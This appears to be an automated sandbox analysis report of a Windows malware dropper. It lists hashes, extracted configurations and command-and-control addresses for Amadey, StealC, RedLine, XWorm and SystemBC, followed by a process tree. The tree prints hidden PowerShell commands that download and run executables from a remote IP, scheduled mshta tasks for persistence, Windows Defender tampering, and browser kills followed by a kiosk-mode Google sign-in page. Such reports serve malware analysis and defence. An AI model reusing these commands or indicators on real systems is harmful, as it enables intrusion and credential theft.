Analysis

  • max time kernel
    106s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    19-02-2025 03:03

General

  • Target

    2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe

  • Size

    2.1MB

  • MD5

    ffa05200d7a741017eb476eef981b041

  • SHA1

    2272ca724539b2e2bef16f3017c1e1e3db9e9485

  • SHA256

    2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001

  • SHA512

    55be906ff0385337b94ea090d1ccb3c4fd0e7d813adca5d6eccd2cfc40c1cbcf3f68a981cf0f97e457737a0b1b57745870e8ded6e58a6834556cd0bfcb8531a9

  • SSDEEP

    49152:1CYg6rMK/aiLLsFf8lTlcZuY+1HSkB1SOpIBC8MiH:i6rbaiEiWH+YklIBC8MiH

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

systembc

C2

cobolrationumelawrtewarms.co:4001

93.186.202.3:4001

Attributes
  • dns

    5.132.191.104

    ns1.vic.au.dns.opennic.glue

    ns2.vic.au.dns.opennic.glue

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Extracted

Family

stealc

Botnet

default

C2

http://ecozessentials.com

Attributes
  • url_path

    /e6cb1c8fc7cd1659.php

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

xworm

Version

5.0

C2

45.154.98.175:7000

Mutex

0HzpJoisb4u9PgIO

Attributes
  • Install_directory

    %AppData%

  • install_file

    google_updates.exe

aes.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 22 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 13 IoCs
  • Uses browser remote debugging 2 TTPs 3 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 44 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 37 IoCs
  • Identifies Wine through registry keys 2 TTPs 22 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 22 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 4 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 10 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 35 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 36 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe
    "C:\Users\Admin\AppData\Local\Temp\2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2108
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1648
      • C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe
        "C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3044
      • C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe
        "C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1248
      • C:\Users\Admin\AppData\Local\Temp\1086705101\257584c93d.exe
        "C:\Users\Admin\AppData\Local\Temp\1086705101\257584c93d.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1480
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn 6EzkXmaFVt8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\uSchx07o1.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1532
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn 6EzkXmaFVt8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\uSchx07o1.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2144
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\uSchx07o1.hta
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1196
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1780
            • C:\Users\Admin\AppData\Local\TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE
              "C:\Users\Admin\AppData\Local\TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE"
              6⤵
              • Modifies Windows Defender DisableAntiSpyware settings
              • Modifies Windows Defender Real-time Protection settings
              • Modifies Windows Defender TamperProtection settings
              • Modifies Windows Defender notification settings
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Windows security modification
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2784
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\1086706021\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2540
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1086706021\am_no.cmd" any_word
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2004
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 2
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:1904
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2584
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:688
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1312
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2380
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2144
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1532
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn "U7swHmaDPix" /tr "mshta \"C:\Temp\HjO2Z8DvW.hta\"" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2664
          • C:\Windows\SysWOW64\mshta.exe
            mshta "C:\Temp\HjO2Z8DvW.hta"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2660
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1708
              • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                PID:2716
      • C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe
        "C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:2896
        • C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe
          "C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe"
          4⤵
          • Executes dropped EXE
          PID:1348
        • C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe
          "C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe"
          4⤵
          • Executes dropped EXE
          PID:2112
        • C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe
          "C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe"
          4⤵
          • Executes dropped EXE
          PID:2656
        • C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe
          "C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          PID:2096
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 584
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:2368
      • C:\Users\Admin\AppData\Local\Temp\1086708001\d2YQIJa.exe
        "C:\Users\Admin\AppData\Local\Temp\1086708001\d2YQIJa.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        PID:2164
      • C:\Users\Admin\AppData\Local\Temp\1086719001\2f051bfec5.exe
        "C:\Users\Admin\AppData\Local\Temp\1086719001\2f051bfec5.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2224
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • Downloads MZ/PE file
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:948
      • C:\Users\Admin\AppData\Local\Temp\1086720001\892cde147c.exe
        "C:\Users\Admin\AppData\Local\Temp\1086720001\892cde147c.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2764
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • Downloads MZ/PE file
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:1496
      • C:\Users\Admin\AppData\Local\Temp\1086721001\51798fd265.exe
        "C:\Users\Admin\AppData\Local\Temp\1086721001\51798fd265.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1972
      • C:\Users\Admin\AppData\Local\Temp\1086722001\2dcd38c299.exe
        "C:\Users\Admin\AppData\Local\Temp\1086722001\2dcd38c299.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1620
      • C:\Users\Admin\AppData\Local\Temp\1086723001\3f44d4da90.exe
        "C:\Users\Admin\AppData\Local\Temp\1086723001\3f44d4da90.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:2296
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2296 -s 888
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:2288
      • C:\Users\Admin\AppData\Local\Temp\1086724001\amnew.exe
        "C:\Users\Admin\AppData\Local\Temp\1086724001\amnew.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        PID:1916
        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
          4⤵
          • Downloads MZ/PE file
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:3068
          • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
            "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:3676
            • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
              "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4028
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 556
              6⤵
              • Loads dropped DLL
              • Program crash
              PID:3136
          • C:\Users\Admin\AppData\Local\Temp\10008020101\8bf3eae87e.exe
            "C:\Users\Admin\AppData\Local\Temp\10008020101\8bf3eae87e.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:3260
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM firefox.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3560
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM chrome.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3132
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM msedge.exe /T
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3024
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM opera.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1888
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM brave.exe /T
              6⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1752
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
              6⤵
                PID:2584
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  7⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:2292
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2292.0.451328319\583435430" -parentBuildID 20221007134813 -prefsHandle 1208 -prefMapHandle 1200 -prefsLen 21196 -prefMapSize 233548 -appDir "C:\Program Files\Mozilla Firefox\browser" - {55a3e374-a35b-46be-88e7-df8b8bbc00f6} 2292 "\\.\pipe\gecko-crash-server-pipe.2292" 1292 136f7858 gpu
                    8⤵
                      PID:3440
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2292.1.375965718\1732964267" -parentBuildID 20221007134813 -prefsHandle 1476 -prefMapHandle 1472 -prefsLen 22057 -prefMapSize 233548 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe9c4358-29a7-4568-b5ac-4049a6db4aec} 2292 "\\.\pipe\gecko-crash-server-pipe.2292" 1488 3fed258 socket
                      8⤵
                        PID:1748
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2292.2.476967381\766125892" -childID 1 -isForBrowser -prefsHandle 2128 -prefMapHandle 1952 -prefsLen 22160 -prefMapSize 233548 -jsInitHandle 848 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b71eb7e-cf79-4604-8a8d-0a3c08d7a161} 2292 "\\.\pipe\gecko-crash-server-pipe.2292" 1936 19eddb58 tab
                        8⤵
                          PID:3536
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2292.3.1310913819\523120997" -childID 2 -isForBrowser -prefsHandle 2716 -prefMapHandle 2712 -prefsLen 26416 -prefMapSize 233548 -jsInitHandle 848 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5ba3cee-ba41-4fd0-a604-8b8b70850154} 2292 "\\.\pipe\gecko-crash-server-pipe.2292" 2732 f64858 tab
                          8⤵
                            PID:2884
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2292.4.577284799\609978067" -childID 3 -isForBrowser -prefsHandle 3448 -prefMapHandle 3444 -prefsLen 26416 -prefMapSize 233548 -jsInitHandle 848 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {69c822d3-fbea-48d1-b1a7-f1a56788999d} 2292 "\\.\pipe\gecko-crash-server-pipe.2292" 3460 f2ed58 tab
                            8⤵
                              PID:3816
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2292.5.52587262\791017943" -childID 4 -isForBrowser -prefsHandle 3572 -prefMapHandle 3576 -prefsLen 26416 -prefMapSize 233548 -jsInitHandle 848 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ffa676c6-a580-47c3-9975-c54f91579675} 2292 "\\.\pipe\gecko-crash-server-pipe.2292" 3560 3fed858 tab
                              8⤵
                                PID:1912
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2292.6.672664237\1660891747" -childID 5 -isForBrowser -prefsHandle 3716 -prefMapHandle 3720 -prefsLen 26416 -prefMapSize 233548 -jsInitHandle 848 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a20127a-b1d4-4a2c-bb6e-7d71056560e6} 2292 "\\.\pipe\gecko-crash-server-pipe.2292" 3476 195e3858 tab
                                8⤵
                                  PID:2112
                          • C:\Users\Admin\AppData\Local\Temp\10008030101\8f4869ffea.exe
                            "C:\Users\Admin\AppData\Local\Temp\10008030101\8f4869ffea.exe"
                            5⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            PID:3656
                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                              6⤵
                                PID:4116
                        • C:\Users\Admin\AppData\Local\Temp\1086725001\90e0ad4bc6.exe
                          "C:\Users\Admin\AppData\Local\Temp\1086725001\90e0ad4bc6.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2420
                        • C:\Users\Admin\AppData\Local\Temp\1086726001\257dc22f39.exe
                          "C:\Users\Admin\AppData\Local\Temp\1086726001\257dc22f39.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2380
                        • C:\Users\Admin\AppData\Local\Temp\1086727001\f63e940856.exe
                          "C:\Users\Admin\AppData\Local\Temp\1086727001\f63e940856.exe"
                          3⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:2100
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /F /IM firefox.exe /T
                            4⤵
                            • System Location Discovery: System Language Discovery
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2088
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /F /IM chrome.exe /T
                            4⤵
                            • System Location Discovery: System Language Discovery
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1568
                          • C:\Windows\SysWOW64\taskkill.exe
